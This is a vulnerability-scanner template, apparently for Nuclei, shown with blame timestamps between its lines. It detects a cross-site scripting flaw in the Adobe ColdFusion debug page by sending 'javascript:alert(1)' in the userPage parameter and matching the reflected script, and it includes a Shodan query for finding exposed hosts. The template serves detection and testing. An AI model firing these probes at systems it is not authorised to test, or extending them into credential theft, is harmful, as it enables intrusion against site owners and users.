2021-07-01 17:01:01 +00:00
id : coldfusion-debug-xss
info :
2022-09-21 21:42:27 +00:00
name : Adobe ColdFusion - Cross-Site Scripting
2021-07-01 17:01:01 +00:00
author : dhiyaneshDK
2022-09-21 21:42:27 +00:00
severity : high
description : Adobe ColdFusion debug page contains a cross-site scripting vulnerability when the application is running on a remote host. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
2022-09-21 21:42:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-05-12 14:18:36 +00:00
metadata :
shodan-query : http.component:"Adobe ColdFusion"
2021-07-22 23:44:57 +00:00
tags : adobe,coldfusion,xss
2021-07-01 17:01:01 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
- '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"cf_main_cf" src="javascript:alert(1)"'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2022-09-21 21:42:27 +00:00
# Enhanced by md on 2022/09/20